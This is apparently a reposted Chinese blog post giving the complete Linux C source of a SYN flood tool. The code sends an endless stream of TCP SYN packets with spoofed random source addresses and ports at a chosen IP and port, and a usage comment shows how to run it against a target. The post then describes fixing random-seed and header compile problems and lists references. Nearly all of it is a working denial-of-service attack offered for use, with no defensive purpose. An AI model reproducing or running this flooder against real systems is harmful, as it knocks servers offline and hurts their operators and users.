• SYN攻击源码

    一、linux下源代码实现
    /* syn flood by wqfhenanxc.
     * random soruce ip and random sourec port.
     * use #include <tcp_new.h>instead of for my own system reason.
     * usage :eg. to flood port 8080 on ip 246.245.167.45   ./synflood 246.245.167.45 8080
     * any question mail to wqfhenanxc@gmail.com 
     * 2009.6.12
     */
    #include 
    #include 
    #include 
    #include 
    #include 
    #include 
    #include 
    #include 
    #include 
    #include 
    //#include "synflood.h"

    //#define DEFAULT_DPORT 80
    //#define SPORT 8888

    #define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min))

    void send_tcp(int sockfd,struct sockaddr_in *addr);
    unsigned short checksum(unsigned short *buffer, int size);
    unsigned short random_port(unsigned short minport,unsigned short maxport);
    void random_ip(char *str);

    int main(int argc,char **argv){
      int sockfd;
      struct sockaddr_in addr;
      //int dport;
      int on=1;
      if(argc!=3){
         printf("usage: <command_name><target_ip> ");
         exit(1);
      }
      bzero(&addr,sizeof(struct sockaddr_in));
      addr.sin_family=AF_INET;
      addr.sin_port=htons(atoi(argv[2]));
      //addr.sin_addr.s_addr=inet_aton(argv[1]);
      inet_pton(AF_INET,argv[1],&addr.sin_addr);
      /*if(inet_aton(argv[1],&addr.sin_addr)==0){
         host=gethostbyname
      }*/
      sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);
      if(sockfd<0){
         printf("Socket error! ");
         exit(1);
      }
      setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));
      while(1){
         send_tcp(sockfd,&addr);
      }
      return 0;
    }

    void send_tcp(int sockfd,struct sockaddr_in *addr){
      char buff[100];
      struct iphdr  ip_header;
      struct tcphdr tcp_header;
      unsigned short source_port=random_port(1024,5000);
      char ip_str[50];
      struct in_addr ip;

      random_ip(ip_str);
      if(inet_aton(ip_str,&ip)==0){
         printf("inet_aton error! ");
         exit(1);
      }
      bzero(buff,100);
      
      //ip_header=(struct iphdr*)buff;
      ip_header.version=4;
      ip_header.ihl=5;
      ip_header.tos=0;
      ip_header.tot_len=sizeof(struct iphdr)+sizeof(struct tcphdr);
      ip_header.id=htons(random());
      ip_header.frag_off=0;
      ip_header.ttl=30;
      ip_header.protocol=IPPROTO_TCP;
      ip_header.check=0;
      ip_header.saddr=ip.s_addr;
      ip_header.daddr=addr->sin_addr.s_addr;

      //tcp_header=(struct tcphdr*)(buff+sizeof(struct iphdr));
      tcp_header.source=htons(source_port);
      tcp_header.dest=addr->sin_port;
      tcp_header.seq=rand();
      tcp_header.doff=sizeof(struct tcphdr)/4;
      tcp_header.ack_seq=0;
      tcp_header.res1=0;
      tcp_header.fin=0;
      tcp_header.syn=1;
      tcp_header.rst=0;
      tcp_header.psh=0;
      tcp_header.ack=0;
      tcp_header.urg=0;
      tcp_header.window=htons(65535);
      tcp_header.check=0;
      tcp_header.urg_ptr=0;

      
      //send_tcp_segment(&ip_header,&tcp_header,"",0);
      struct{
         unsigned long saddr;
         unsigned long daddr;
         char mbz;
         char ptcl;
         unsigned short tcpl;
      }psd_header;

      psd_header.saddr=ip_header.saddr;
      psd_header.daddr=ip_header.daddr;
      psd_header.mbz=0;
      psd_header.ptcl=IPPROTO_TCP;
      psd_header.tcpl=htons(sizeof(struct tcphdr));

      memcpy(buff,&psd_header,sizeof(psd_header));
      memcpy(buff+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
      //memcpy(buf+sizeof(psd_header)+sizeof(tcp_header),data,dlen);
      //memset(buf+sizeof(psd_header)+sizeof(tcp_header)+dlen,0,4);
      tcp_header.check=checksum((unsigned short*)buff,sizeof(psd_header)+sizeof(tcp_header));
      
      memcpy(buff,&ip_header,4*ip_header.ihl);
      memcpy(buff+4*ip_header.ihl,&tcp_header,sizeof(tcp_header));
      //memcpy(buf+4*ip_header.ihl+sizeof(tcp_header),data,dlen);
      //memset(buf+4*ip_header.ihl+sizeof(tcp_header)+dlen,0,4);
      ip_header.check=checksum((unsigned short*)buff,4*ip_header.ihl+sizeof(tcp_header));
       
      // send_seq=SEQ+1+strlen(buf);
      
      sendto(sockfd,buff,sizeof(struct iphdr)+sizeof(struct tcphdr),0,
                 (struct sockaddr*)addr,sizeof(struct sockaddr_in));
     
    }


    unsigned short checksum(unsigned short *buffer, int size){

      unsigned long cksum=0;

            while(size >1) {

                cksum+=*buffer++;

                size -=sizeof(unsigned short);

            }

            if(size ) cksum += *(unsigned char*)buffer;  //..buffer..size..2......

            cksum = (cksum >> 16) + (cksum & 0xffff);

            cksum += (cksum >>16);

            return (unsigned short)(~cksum);

    }

    unsigned short random_port(unsigned short minport,unsigned short maxport){
      /*struct time stime;
      unsigned seed;
      gettime(&stime);
      seed=stime.ti_hund*stime.ti_min*stime.ti_hour;
      srand(seed);*/
      srand((unsigned)time(NULL));
      return(getrandom(minport,maxport));
    }

    void random_ip(char *str){
      int a,b,c,d,i=0;
      static long j=0;
      srand((unsigned)time(NULL)+(i++)+(j++));
      a=getrandom(0,255);
      srand((unsigned)time(NULL)+(i++)+(j++));
      b=getrandom(0,255);
      srand((unsigned)time(NULL)+(i++)+(j++));
      c=getrandom(0,255);
      srand((unsigned)time(NULL)+(i++)+(j++));
      d=getrandom(0,255);
      sprintf(str,"%d.%d.%d.%d",a,b,c,d);
      printf("%s ",str);  
    }

    二、编写中遇到的问题
    1.rand()函数问题。随机ip地址四个字段分别生成,结果由于生成速度太快,作为srand()种子的系统时间没有来得及变化,导致ip四个字段相同,如118.118.118.118,并且接连有10个左右的包是同一个ip。解决办法是引入自增量i和j。
    2.编译错误如下:
    /usr/include/linux/ip.h:95: error: syntax error before "__u8"
    /usr/include/linux/ip.h:102: error: syntax error before "tot_len"
    /usr/include/linux/ip.h:103: error: syntax error before "id"
    /usr/include/linux/ip.h:104: error: syntax error before "frag_off"
    /usr/include/linux/ip.h:105: error: syntax error before "ttl"
    /usr/include/linux/ip.h:106: error: syntax error before "protocol"
    /usr/include/linux/ip.h:107: error: syntax error before "check"
    /usr/include/linux/ip.h:108: error: syntax error before "saddr"
    /usr/include/linux/ip.h:109: error: syntax error before "daddr"
    。。。
    。。。
    。。。

    /usr/include/linux/tcp.h:105: enumerator value for `TCP_FLAG_CWR' not
    integer constant
    /usr/include/linux/tcp.h:106: syntax error before "__u32"
    /usr/include/linux/tcp.h:107: syntax error before "__u32"
    /usr/include/linux/tcp.h:108: syntax error before "__u32"
    /usr/include/linux/tcp.h:109: syntax error before "__u32"
    /usr/include/linux/tcp.h:110: syntax error before "__u32"
    /usr/include/linux/tcp.h:111: syntax error before "__u32"
    /usr/include/linux/tcp.h:112: syntax error before "__u32"
    /usr/include/linux/tcp.h:113: syntax error before "__u32"
    /usr/include/linux/tcp.h:114: syntax error before "__u32"

    以上两个错误是由于系统的ip.h和tcp.h确实有问题,
    第一个错误通过 增加 #include 来解决,该文件包含了__u8和__u32的定义。

    第二个错误源自tcp.h的如下几行:
    enum {
    TCP_FLAG_CWR = htonl(0x00800000)
    TCP_FLAG_ECE = htonl(0x00400000),
    TCP_FLAG_URG = htonl(0x00200000),
    TCP_FLAG_ACK = htonl(0x00100000),
    TCP_FLAG_PSH = htonl(0x00080000),
    TCP_FLAG_RST = htonl(0x00040000),
    TCP_FLAG_SYN = htonl(0x00020000),
    TCP_FLAG_FIN = htonl(0x00010000),
    TCP_RESERVED_BITS = htonl(0x0FC000000),
    TCP_DATA_OFFSET = htonl(0xF0000000)
    };
    解决办法:将tcp.h的内容拷贝到另一个新建的文件tcp_new.h中,在新文件中去掉上面几行代码中的htonl,在自己的文件中用#include 代替#include 即可。

    参考资料:
    1.http://www.linuxsir.org/bbs/showthread.php?t=101990
    2.Zakath的syn-flood源码
    3.http://fanqiang.chinaunix.net/a4/b7/20010508/112433.html
  • 相关阅读:
    JavaScript进阶-BOM和DOM
    JavaScript基础
    CSS2-属性
    CSS1-选择器
    HTML-常用标签
    判断回文
    课堂作业
    动手动脑
    原码反码补码
    Java第一次考试作业
  • 原文地址:https://www.cnblogs.com/fchy822/p/4805609.html
Copyright © 2020-2023  润新知